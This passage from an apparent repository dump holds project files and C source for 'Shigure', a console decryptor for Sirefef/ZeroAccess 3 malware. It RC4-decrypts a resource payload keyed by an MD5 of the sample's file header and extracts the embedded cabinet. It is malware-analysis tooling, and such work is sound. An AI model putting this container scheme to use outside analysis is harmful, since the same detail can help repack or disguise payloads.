    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        101\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Shigure/Shigure.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{77AD1A3E-BA02-4376-976D-BA356F98F32F}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Shigure</RootNamespace>\n    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>zadecrypt32</TargetName>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>zadecrypt64</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    
</ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <CompileAs>CompileAsC</CompileAs>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <CompileAs>CompileAsC</CompileAs>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\itostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_filename.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\" />\n    
<ClCompile Include=\"..\\minirtl\\_strcpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strend.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\" />\n    <ClCompile Include=\"..\\shared\\cab.c\" />\n    <ClCompile Include=\"..\\shared\\cui.c\" />\n    <ClCompile Include=\"..\\shared\\ldr.c\" />\n    <ClCompile Include=\"..\\shared\\md5.c\" />\n    <ClCompile Include=\"..\\shared\\util.c\" />\n    <ClCompile Include=\"main.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\minirtl\\_filename.h\" />\n    <ClInclude Include=\"..\\shared\\cab.h\" />\n    <ClInclude Include=\"..\\shared\\cui.h\" />\n    <ClInclude Include=\"..\\shared\\global.h\" />\n    <ClInclude Include=\"..\\shared\\ldr.h\" />\n    <ClInclude Include=\"..\\shared\\md5.h\" />\n    <ClInclude Include=\"..\\shared\\ntos.h\" />\n    <ClInclude Include=\"..\\shared\\util.h\" />\n    <ClInclude Include=\"..\\shared\\za.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Shigure/Shigure.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{0b82da90-09b9-424a-b217-d47fbaa87c59}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"shared\">\n      <UniqueIdentifier>{de1e4bba-d683-4dce-a248-b53266169d63}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile 
Include=\"..\\minirtl\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\cui.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\md5.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\util.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\cab.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n   
 <ClCompile Include=\"..\\minirtl\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ldr.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\cui.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\global.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\md5.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ntos.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\util.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\cab.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ldr.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Shigure/Shigure.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Shigure/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.02\n*\n*  DATE:        01 Dec 2017\n*\n*  Shigure program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma comment(lib, \"bcrypt.lib\")\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\cab.h\"\n\n#include <Bcrypt.h>\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFDECRYPTTITLE L\"Sirefef/ZeroAccess 3 decryptor v1.0 (10/01/16)\"\n#define T_SFDECRYPTUSAGE L\"Usage: zadecrypt inputfile [outputfile]\\r\\n\\te.g. zadecrypt in.dll out.bin\\r\\n\"\n#define T_SFDECRYPTED    L\"File decrypted \"\n#define T_SFDECRYPTFAIL  L\"\\r\\nError while decrypting file\"\n#define T_SFPRESSANYKEY  L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfDecryptPayload\n*\n* Purpose:\n*\n* Decrypt the container stored in resource 2 of the input file with RC4,\n* using the MD5 hash of the IMAGE_FILE_HEADER bytes as the key, then try\n* to extract the Microsoft Cabinet from the decrypted data.\n*\n* CNG variant\n*\n*/\nUINT SfDecryptPayload(\n    LPWSTR lpParameter\n)\n{\n    BOOL                cond = FALSE, bSuccess = FALSE;\n    PBYTE               cng_object, hashdata, decrypted, enc_data, extracted;\n    ULONG               obj_sz, rlen, hdatasz, enc_data_size;\n    BCRYPT_ALG_HANDLE   h_alg = NULL;\n    BCRYPT_HASH_HANDLE  h_hash = NULL;\n    BCRYPT_KEY_HANDLE   h_rc4key = NULL;\n    NTSTATUS            status;\n    HANDLE              pheap = NULL;\n    PIMAGE_FILE_HEADER  fheader;\n    PVOID               pdll = NULL;\n    WCHAR               InputFile[MAX_PATH + 1], OutputFile[MAX_PATH + 1];\n\n    rlen = 0;\n    RtlSecureZeroMemory(InputFile, 
sizeof(InputFile));\n    GetCommandLineParam(lpParameter, 1, InputFile, MAX_PATH, &rlen);\n    if (rlen == 0) {\n        SfcuiPrintText(g_ConOut,\n            T_SFDECRYPTUSAGE,\n            g_ConsoleOutput, FALSE);\n        return (UINT)-1;\n    }\n\n    do {\n\n        rlen = 0;\n        GetCommandLineParam(lpParameter, 2, OutputFile, MAX_PATH, &rlen);\n\n        if (rlen == 0)\n            _strcpy(OutputFile, TEXT(\"out.bin\"));\n\n        pdll = SfuCreateFileMappingNoExec(InputFile);\n        if (pdll == NULL)\n            break;\n\n        enc_data_size = 0;\n        enc_data = SfLdrQueryResourceData(2, pdll, &enc_data_size);\n        if (enc_data == NULL)\n            break;\n\n        fheader = &(RtlImageNtHeader(pdll)->FileHeader);\n\n        status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_MD5_ALGORITHM, NULL, 0);\n        if (!NT_SUCCESS(status))\n            break;\n        obj_sz = 0;\n        rlen = 0;\n        status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        hdatasz = 0;\n        rlen = 0;\n        status = BCryptGetProperty(h_alg, BCRYPT_HASH_LENGTH, (PUCHAR)&hdatasz, sizeof(hdatasz), &rlen, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        pheap = HeapCreate(0, 0, 0);\n        if (pheap == NULL)\n            break;\n\n        cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);\n        if (cng_object == NULL)\n            break;\n\n        hashdata = HeapAlloc(pheap, HEAP_ZERO_MEMORY, hdatasz);\n        if (hashdata == NULL)\n            break;\n\n        status = BCryptCreateHash(h_alg, &h_hash, cng_object, obj_sz, NULL, 0, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = BCryptHashData(h_hash, (PUCHAR)fheader, sizeof(IMAGE_FILE_HEADER), 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = BCryptFinishHash(h_hash, hashdata, hdatasz, 0);\n        if 
(!NT_SUCCESS(status))\n            break;\n\n        BCryptDestroyHash(h_hash);\n        BCryptCloseAlgorithmProvider(h_alg, 0);\n        HeapFree(pheap, 0, cng_object);\n        h_alg = NULL;\n        h_hash = NULL;\n\n        status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_RC4_ALGORITHM, NULL, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        obj_sz = 0;\n        rlen = 0;\n        status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);\n        if (cng_object == NULL)\n            break;\n\n        status = BCryptGenerateSymmetricKey(h_alg, &h_rc4key, cng_object, obj_sz, hashdata, hdatasz, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        decrypted = HeapAlloc(pheap, HEAP_ZERO_MEMORY, enc_data_size);\n        if (decrypted == NULL)\n            break;\n\n        rlen = 0;\n        status = BCryptEncrypt(h_rc4key, enc_data, enc_data_size, NULL, NULL, 0, decrypted, enc_data_size, &rlen, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        bSuccess = FALSE;\n        enc_data_size = rlen;\n        rlen = 0;\n        extracted = SfcabExtractMemory(decrypted, enc_data_size, &rlen);\n        if (extracted) {\n\n            if (SfuWriteBufferToFile(OutputFile, extracted, rlen, FALSE, FALSE) == rlen) {\n                bSuccess = TRUE;\n            }\n            LocalFree(extracted);\n        }\n        else {\n            //failed to extract, drop cab as is\n            if (SfuWriteBufferToFile(OutputFile, decrypted, enc_data_size, FALSE, FALSE) == enc_data_size) {\n                bSuccess = TRUE;\n            }\n        }\n\n        if (bSuccess) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFDECRYPTED,\n                g_ConsoleOutput, FALSE);\n\n            SfcuiPrintText(g_ConOut,\n                OutputFile,\n                
g_ConsoleOutput, FALSE);\n        }\n\n    } while (cond);\n\n    if (bSuccess == FALSE) {\n\n        SfcuiPrintText(g_ConOut,\n            T_SFDECRYPTFAIL,\n            g_ConsoleOutput, FALSE);\n\n    }\n\n    if (h_rc4key != NULL)\n        BCryptDestroyKey(h_rc4key);\n\n    if (h_hash != NULL)\n        BCryptDestroyHash(h_hash);\n\n    if (h_alg != NULL)\n        BCryptCloseAlgorithmProvider(h_alg, 0);\n\n    if (pheap != NULL)\n        HeapDestroy(pheap);\n\n    if (pdll != 0)\n        NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pdll);\n\n    // Report failure to the caller so the process exit code reflects it.\n    return bSuccess ? 0 : (UINT)-1;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Shigure main.\n*\n*/\nvoid SfMain(\n    VOID\n)\n{\n    BOOL         cond = FALSE;\n    UINT         uResult = 0;\n    DWORD        dwTemp;\n    HANDLE       StdIn;\n    INPUT_RECORD inp1;\n\n    __security_init_cookie();\n\n    do {\n\n        g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n        if (g_ConOut == INVALID_HANDLE_VALUE) {\n            uResult = (UINT)-1;\n            break;\n        }\n\n        g_ConsoleOutput = TRUE;\n        if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n            g_ConsoleOutput = FALSE;\n        }\n\n        SetConsoleTitle(T_SFDECRYPTTITLE);\n        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n        if (g_ConsoleOutput == FALSE) {\n            WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n        }\n\n        uResult = SfDecryptPayload(GetCommandLine());\n\n        if (g_ConsoleOutput) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFPRESSANYKEY,\n                TRUE, FALSE);\n\n            StdIn = GetStdHandle(STD_INPUT_HANDLE);\n            if (StdIn != INVALID_HANDLE_VALUE) {\n                RtlSecureZeroMemory(&inp1, sizeof(inp1));\n                ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n                ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n            }\n        }\n\n    } while (cond);\n\n    ExitProcess(uResult);\n}\n"
  },
  {
